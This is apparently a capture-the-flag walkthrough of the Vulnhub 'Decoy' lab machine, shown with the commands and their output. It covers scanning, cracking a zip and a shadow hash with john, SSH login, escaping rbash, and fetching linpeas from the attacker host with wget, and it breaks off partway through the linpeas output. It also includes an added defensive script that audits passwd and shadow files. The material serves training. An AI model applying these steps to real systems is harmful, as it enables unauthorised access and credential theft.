Vulnhub Decoy Walkthrough

Decoy

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.61.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor
 192.168.56.100  08:00:27:ef:a8:59      1      60  PCS Systemtechnik GmbH
 192.168.56.158  08:00:27:3c:d4:65      1      60  PCS Systemtechnik GmbH

Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.158.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.158 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-07 04:10 EST
Nmap scan report for bogon (192.168.56.158)
Host is up (0.00028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA)
|   256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA)
|_  256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519)
80/tcp open  http    Apache httpd 2.4.38
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.0K  2020-07-07 16:36  save.zip
|_
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:3C:D4:65 (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.59 seconds

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ gobuster dir -u http://192.168.56.158 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.158
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/07 04:19:18 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 279]
Progress: 17944 / 56165 (31.95%)[ERROR] 2022/11/07 04:19:21 [!] parse "http://192.168.56.158/error\x1f_log": net/url: invalid control character in URL
Progress: 53999 / 56165 (96.14%)===============================================================
2022/11/07 04:19:25 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ gobuster dir -u http://192.168.56.158 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.158
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              txt,sh,php,html
[+] Timeout:                 10s
===============================================================
2022/11/07 04:19:36 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
Progress: 94217 / 280825 (33.55%)[ERROR] 2022/11/07 04:19:47 [!] parse "http://192.168.56.158/besalu\t.php": net/url: invalid control character in URL
Progress: 103125 / 280825 (36.72%)[ERROR] 2022/11/07 04:19:47 [!] parse "http://192.168.56.158/error\x1f_log": net/url: invalid control character in URL
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
Progress: 280150 / 280825 (99.76%)===============================================================
2022/11/07 04:20:07 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ nikto -h http://192.168.56.158
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.158
+ Target Hostname:    192.168.56.158
+ Target Port:        80
+ Start Time:         2022-11-07 04:20:14 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /: Directory indexing found.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3268: /./: Directory indexing found.
+ /./: Appending '/./' to a directory allows indexing
+ OSVDB-3268: //: Directory indexing found.
+ //: Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.
+ OSVDB-3268: /%2e/: Directory indexing found.
+ OSVDB-576: /%2e/: Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. http://www.securityfocus.com/bid/2513.
+ OSVDB-3268: ///: Directory indexing found.
+ OSVDB-119: /?PageServices: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
+ OSVDB-119: /?wp-cs-dump: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
+ OSVDB-3268: ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Directory indexing found.
+ OSVDB-3288: ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Abyss 1.03 reveals directory listing when     /'s are requested.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2022-11-07 04:21:03 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? n

┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ dirb http://192.168.56.158

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Nov  7 04:21:11 2022
URL_BASE: http://192.168.56.158/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.158/ ----
+ http://192.168.56.158/server-status (CODE:403|SIZE:279)

-----------------
END_TIME: Mon Nov  7 04:21:13 2022
DOWNLOADED: 4612 - FOUND: 1


Download save.zip from the target site to the local machine.

┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ mv ~/Downloads/save.zip .

┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ ls
nmap_full_scan  save.zip

┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ unzip save.zip
Archive:  save.zip
[save.zip] etc/passwd password:

┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ zip2john save.zip > hashes
ver 2.0 efh 5455 efh 7875 save.zip/etc/passwd PKZIP Encr: TS_chk, cmplen=668, decmplen=1807, crc=B3ACDAFE ts=90AB cs=90ab type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/shadow PKZIP Encr: TS_chk, cmplen=434, decmplen=1111, crc=E11EC139 ts=834F cs=834f type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/group PKZIP Encr: TS_chk, cmplen=460, decmplen=829, crc=A1F81C08 ts=8D07 cs=8d07 type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/sudoers PKZIP Encr: TS_chk, cmplen=368, decmplen=669, crc=FF05389F ts=1535 cs=1535 type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/hosts PKZIP Encr: TS_chk, cmplen=140, decmplen=185, crc=DFB905CD ts=8759 cs=8759 type=8
ver 1.0 efh 5455 efh 7875 ** 2b ** save.zip/etc/hostname PKZIP Encr: TS_chk, cmplen=45, decmplen=33, crc=D9C379A9 ts=8CE8 cs=8ce8 type=0
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ ls
hashes  nmap_full_scan  save.zip

┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ john hashes /usr/share/wordlists/rockyou.txt

Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
manuel           (save.zip)     
1g 0:00:00:00 DONE 2/3 (2022-11-07 04:24) 16.66g/s 1263Kp/s 1263Kc/s 1263KC/s 123456..Peter
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ 


The password of save.zip was cracked successfully.

┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ cd etc

┌──(kali㉿kali)-[~/Vulnhub/Decoy/etc]
└─$ ls
group  hostname  hosts  passwd  shadow  sudoers

┌──(kali㉿kali)-[~/Vulnhub/Decoy/etc]
└─$ cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
avahi:x:107:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:108:118::/var/lib/saned:/usr/sbin/nologin
colord:x:109:119:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:110:7:HPLIP system user,,,:/var/run/hplip:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
296640a3b825115a47b68fc44501c828:x:1000:1000:,,,:/home/296640a3b825115a47b68fc44501c828:/bin/rbash

┌──(kali㉿kali)-[~/Vulnhub/Decoy/etc]
└─$ cat sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root    ALL=(ALL:ALL) ALL

# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d

┌──(kali㉿kali)-[~/Vulnhub/Decoy/etc]
└─$ ls
group  hostname  hosts  passwd  shadow  sudoers

┌──(kali㉿kali)-[~/Vulnhub/Decoy/etc]
└─$ cat shadow
root:$6$RucK3DjUUM8TjzYJ$x2etp95bJSiZy6WoJmTd7UomydMfNjo97Heu8nAob9Tji4xzWSzeE0Z2NekZhsyCaA7y/wbzI.2A2xIL/uXV9.:18450:0:99999:7:::
daemon:*:18440:0:99999:7:::
bin:*:18440:0:99999:7:::
sys:*:18440:0:99999:7:::
sync:*:18440:0:99999:7:::
games:*:18440:0:99999:7:::
man:*:18440:0:99999:7:::
lp:*:18440:0:99999:7:::
mail:*:18440:0:99999:7:::
news:*:18440:0:99999:7:::
uucp:*:18440:0:99999:7:::
proxy:*:18440:0:99999:7:::
www-data:*:18440:0:99999:7:::
backup:*:18440:0:99999:7:::
list:*:18440:0:99999:7:::
irc:*:18440:0:99999:7:::
gnats:*:18440:0:99999:7:::
nobody:*:18440:0:99999:7:::
_apt:*:18440:0:99999:7:::
systemd-timesync:*:18440:0:99999:7:::
systemd-network:*:18440:0:99999:7:::
systemd-resolve:*:18440:0:99999:7:::
messagebus:*:18440:0:99999:7:::
avahi-autoipd:*:18440:0:99999:7:::
sshd:*:18440:0:99999:7:::
avahi:*:18440:0:99999:7:::
saned:*:18440:0:99999:7:::
colord:*:18440:0:99999:7:::
hplip:*:18440:0:99999:7:::
systemd-coredump:!!:18440::::::
296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::

We now have the username: 296640a3b825115a47b68fc44501c828

and its hashed password:

$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.

The next step is to crack this hash.
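The two recovered files tell a defender more than a single hash does. The Python below is an added example (not part of the original walkthrough); it embeds a subset of the passwd and shadow lines shown above as constructed sample input, joins passwd(5) and shadow(5) entries by account name, and reports per account the crypt(3) hash scheme (the $6$ prefix is sha512crypt, with the default 5000 rounds that john later reports as its cost), whether the account is locked, when the password was last changed, whether the login shell is interactive, and whether it is a restricted shell such as rbash. The prefix table follows crypt(5); the sets of nologin and restricted shells are this example's own assumptions. Run against a live system's files, the same audit shows exactly which accounts a leaked shadow copy exposes.

```python
"""Audit passwd(5)/shadow(5) entries: which accounts can actually log in, and how.
Added example, not part of the original walkthrough; samples are a subset of the files above."""
import datetime as dt
import os

# Constructed sample input: a subset of the recovered passwd/shadow entries.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
296640a3b825115a47b68fc44501c828:x:1000:1000:,,,:/home/296640a3b825115a47b68fc44501c828:/bin/rbash
"""
SHADOW_SAMPLE = """\
root:$6$RucK3DjUUM8TjzYJ$x2etp95bJSiZy6WoJmTd7UomydMfNjo97Heu8nAob9Tji4xzWSzeE0Z2NekZhsyCaA7y/wbzI.2A2xIL/uXV9.:18450:0:99999:7:::
daemon:*:18440:0:99999:7:::
systemd-coredump:!!:18440::::::
296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::
"""

# crypt(3) modular-format prefixes per crypt(5); the shell sets are this example's assumptions.
HASH_SCHEMES = {"$1$": "md5crypt", "$2b$": "bcrypt", "$5$": "sha256crypt",
                "$6$": "sha512crypt", "$y$": "yescrypt"}
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}
RESTRICTED_SHELLS = {"rbash", "rksh", "rzsh"}


def classify_hash(field):
    """Return the hash scheme name, or 'empty' / 'locked' / 'unknown'."""
    if field == "":
        return "empty"           # no password at all: login without a password
    if field[0] in "!*":
        return "locked"          # '*', '!', '!!' or a '!'-prefixed (disabled) hash
    for prefix, name in HASH_SCHEMES.items():
        if field.startswith(prefix):
            return name
    return "unknown"


def hash_rounds(field):
    """Iteration count of a sha256/sha512crypt hash: explicit rounds=N or the default 5000."""
    if not field.startswith(("$5$", "$6$")):
        return None
    setting = field.split("$")[2]
    return int(setting[len("rounds="):]) if setting.startswith("rounds=") else 5000


def days_to_date(field):
    """shadow(5) stores dates as days since 1970-01-01; an empty field means 'not set'."""
    return None if field == "" else (dt.date(1970, 1, 1) + dt.timedelta(days=int(field))).isoformat()


def parse_colon_file(text, min_fields):
    """Return {account: fields} for a colon-separated account file, skipping blanks and comments."""
    rows = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < min_fields:
            raise ValueError(f"malformed entry: {line!r}")
        rows[fields[0]] = fields
    return rows


def audit(passwd_text, shadow_text):
    """Join passwd and shadow by account name and derive a per-account risk view."""
    shadow = parse_colon_file(shadow_text, 9)
    report = []
    for name, fields in parse_colon_file(passwd_text, 7).items():
        shell, sh = fields[6], shadow.get(name)
        # Accounts missing from shadow fall back to the passwd field ('x' -> 'unknown').
        hash_field = sh[1] if sh else fields[1]
        scheme = classify_hash(hash_field)
        report.append({
            "name": name, "uid": int(fields[2]), "shell": shell, "hash": scheme,
            "rounds": hash_rounds(hash_field),
            "last_change": days_to_date(sh[2]) if sh else None,
            "restricted_shell": os.path.basename(shell) in RESTRICTED_SHELLS,
            # A leaked hash only matters where a login is possible and the account is not locked.
            "login_capable": shell not in NOLOGIN_SHELLS and scheme != "locked",
        })
    return report


def login_capable_accounts(passwd_text, shadow_text):
    """Names of the accounts a leaked shadow copy actually exposes."""
    return [r["name"] for r in audit(passwd_text, shadow_text) if r["login_capable"]]


if __name__ == "__main__":
    for r in audit(PASSWD_SAMPLE, SHADOW_SAMPLE):
        flags = [f for f, on in (("LOGIN", r["login_capable"]),
                                 ("restricted-shell", r["restricted_shell"]),
                                 ("uid0", r["uid"] == 0)) if on]
        print(f"{r['name']:<34} {r['shell']:<18} {r['hash']:<12} rounds={r['rounds']} "
              f"changed={r['last_change']} {' '.join(flags)}")
```

On the sample, only root and the uid 1000 account come out as login-capable; the system accounts are either locked with * or !! or have a nologin shell. The last-change date of both real accounts decodes to 2020-07-07, the same day stamped on save.zip in the Apache listing, which is the kind of cross-check an incident responder would make when deciding how old a leaked credential set is.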

┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt shadow 
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
server           (296640a3b825115a47b68fc44501c828)     
1g 0:00:00:04 DONE (2022-11-07 04:29) 0.2403g/s 4123p/s 4123c/s 4123C/s felton..Hunter
Use the "--show" option to display all of the cracked passwords reliably
Session completed.


The password was cracked successfully. Next, log in to the target host with this username and password.

┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ ssh 296640a3b825115a47b68fc44501c828@192.168.56.158
The authenticity of host '192.168.56.158 (192.168.56.158)' can't be established.
ED25519 key fingerprint is SHA256:qzYkm7MeglkL3QtA6bU4nv7yc8jlb1x7fZ7ALPBohNQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.158' (ED25519) to the list of known hosts.
296640a3b825115a47b68fc44501c828@192.168.56.158's password: 
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jul  7 16:45:50 2020 from 192.168.1.162
-rbash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ sudo -l
-rbash: sudo: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls
honeypot.decoy  honeypot.decoy.cpp  id  ifconfig  ls  mkdir  SV-502  user.txt
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat user.txt
-rbash: cat: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ 

This turns out to be a restricted shell: even cat cannot be run. The ssh command needs "bash --noprofile" appended.

That still does not work. Checking the environment variables shows that PATH contains only the home directory, so PATH needs to be changed.

┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ ssh 296640a3b825115a47b68fc44501c828@192.168.56.158 -t "bash --noprofile"
296640a3b825115a47b68fc44501c828@192.168.56.158's password: 
bash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls
honeypot.decoy  honeypot.decoy.cpp  id  ifconfig  ls  mkdir  SV-502  user.txt
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat user.txt
bash: cat: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ echo $PATH
PATH:/home/296640a3b825115a47b68fc44501c828/
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/sbin
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat user.txt
35253d886842075b2c6390f35946e41f
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ 

Privilege escalation

Upload the linpeas.sh script to the target host and run it:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ wget http://192.168.56.137:8000/linpeas.sh
--2022-11-07 04:37:19--  http://192.168.56.137:8000/linpeas.sh
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827827 (808K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh                                                 100%[========================================================================================================================================>] 808.42K  --.-KB/s    in 0.003s  

2022-11-07 04:37:19 (228 MB/s) - ‘linpeas.sh’ saved [827827/827827]

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ ls
linpeas.sh  systemd-private-033dd996c6d74ddc8c911490693b6c8f-apache2.service-6n54cg  systemd-private-033dd996c6d74ddc8c911490693b6c8f-systemd-timesyncd.service-3K1JiJ
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ chmod +x linpeas.sh
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ ./linpeas.sh


                            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄ 
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄ 
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀

    /---------------------------------------------------------------------------------\
    |                             Do you like PEASS?                                  |
    |---------------------------------------------------------------------------------|
    |         Get the latest version    :     https://github.com/sponsors/carlospolop |
    |         Follow on Twitter         :     @carlospolopm                           |
    |         Respect on HTB            :     SirBroccoli                             |
    |---------------------------------------------------------------------------------|
    |                                 Thank you!                                      |
    \---------------------------------------------------------------------------------/
          linpeas-ng by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
 LEGEND:                                                                                                                                                                                                                                    
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting linpeas. Caching Writable Folders...

                               ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
                               ╚═══════════════════╝
OS: Linux version 4.19.0-9-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07)
User & Groups: uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)
Hostname: 60832e9f188106ec5bcc4eb7709ce592
Writable folder: /dev/shm
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /usr/bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)


Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE

                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
                              ╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.19.0-9-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07)
Distributor ID: Debian
Description:    Debian GNU/Linux 10 (buster)
Release:        10
Codename:       buster

╔══════════╣ Sudo version
